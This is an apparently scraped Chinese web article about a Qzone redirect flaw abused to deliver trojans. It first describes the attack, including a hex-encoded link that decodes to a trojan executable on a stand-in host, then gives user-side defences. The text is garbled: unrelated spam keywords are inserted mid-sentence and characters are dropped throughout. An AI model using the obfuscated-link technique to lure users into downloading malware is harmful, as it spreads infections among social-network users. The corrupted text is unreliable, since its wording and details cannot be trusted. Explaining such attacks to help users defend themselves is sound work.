西藏信息港

当前位置:

Qzone地址为木马载体成为黑客利器

2019/04/11 来源:西藏信息港

导读

由于在桌面IM领域占据着霸主地位,在其身上衍生的各种产品也变得日益流行,而Qzone也逐渐成为友书写日志和展示个性的地方。因此,Qzon

由于在桌面IM领域占据着霸主地位,在其身上衍生的各种产品也变得日益流行,而Qzone也逐渐成为友书写日志和展示个性的地方。因此,Qzone的安全性也备受关注。不过,Qzone近日却爆出了一个跨站漏洞,这个漏洞非常容易被黑客利用。那么,黑客一般会如何通过这个漏洞来攻击普通用户呢?作为用户,我们又如何来防范这一漏洞的危害呢?

一、模拟黑客攻击

这里,我们首先来了解这个漏洞的具体情况。Qzone的跨站漏洞是友无意中打开类似"号码?url=任意字母"时发现的,这时页显示为一个框架页,中间为"无法打开页"的空白页面(如图1);然而,当输入类似"号码?url="的地址时却可以正常显示,这时url后的址其实在幕后是加载的。那么,Qzone的跨站漏洞又是如何被黑客作为木马的媒介的呢?

Qzone默认加载的地址要小心

步:黑客需要对该地址进行乔装改扮一番。比如:页木马的url为""。黑客会使用URl加密技术来为木马地址作掩护北京印刷厂
,常用的方法是把url地址转换为16进制轴套
,这里以ASCII码随心换为例(如图2)进行示范。

黑客常用URL伪装器

第二步:黑客将Qzone的地址设置为"号码?url=%68%74%74%70%3A%2F%2F%77%77%77%2E%6D%75%6D%61%2E%63%6F%6D%2F%6D%75%6D%61%2E%65%78%65"并在页上贴出Qzone的地址来引诱友点击,用户往往点击了该地址下载运行了木马还蒙在鼓里。

二、如何防范Qzone攻击

方法1:既然这一跨站漏洞这么隐蔽,用户感染的几率也不会低。我们需要如何来防范这一漏洞可能造成的危害呢?做到不感染病毒,未雨绸缪是有效果的。因此,我们在访问友的Qzone前,要多长几个心眼,要观察其址的形式。

一般正常的Qzone的地址是"号码"或者"http://号码."形式的,如果出现"号码?url="的地址就要谨慎了,Qzone也可能出现类似"号码/?url=http%3A//号码%26albumid%3D%26photoid%3D"的地址,如果地址里面完全没有的地址段,那么为了防止下载运行页木马,可以将url后的字符输入到ASCII码随心换进行转换(如果是像以上地址的格式,可以将%后的十六进制字符逐个进行转换来获得完整地址),如果url指向可执行文件就不能点击了。

方法2:为了防止系统被种植页木马,还可以安装杀毒软件和防火墙并需要开始实时文件和络监控医院呼叫器
,这样即使下载了页木马也会被清除。如果发现了可疑的Qzone地址要及时举报,让黑客成为过街老鼠,毫无藏身之处。

小结:Qzone的跨站漏洞被用来种植木马具有受众广的特点,Qzone的地址经过加密化装后,又有几个人会仔细地进行甄别呢?因此,利用人们偷窥人家隐私空间的好奇心来传播木马是很有效果的。

其实,要防范Qzone地址在你的电脑种植木马也不难,简单的方法就是只点击资料里的Qzone地址,不去其他站点击就可以了。另外,需要使用具有防范IE漏洞的安全工具和杀毒软件来查杀这类木马的下载安装,如:瑞星卡卡。携带木马的Qzone地址一经发现要马上通知友,决不姑息,不让其他人成为黑客的牺牲品。同时,每次Qzone提示升级我们也升级不用嫌麻烦而取消升级,以免被黑客利用其他未知的漏洞。

更多热点:Photoshop教程ASP入门教程视频教程 图片教程开发速查手册

标签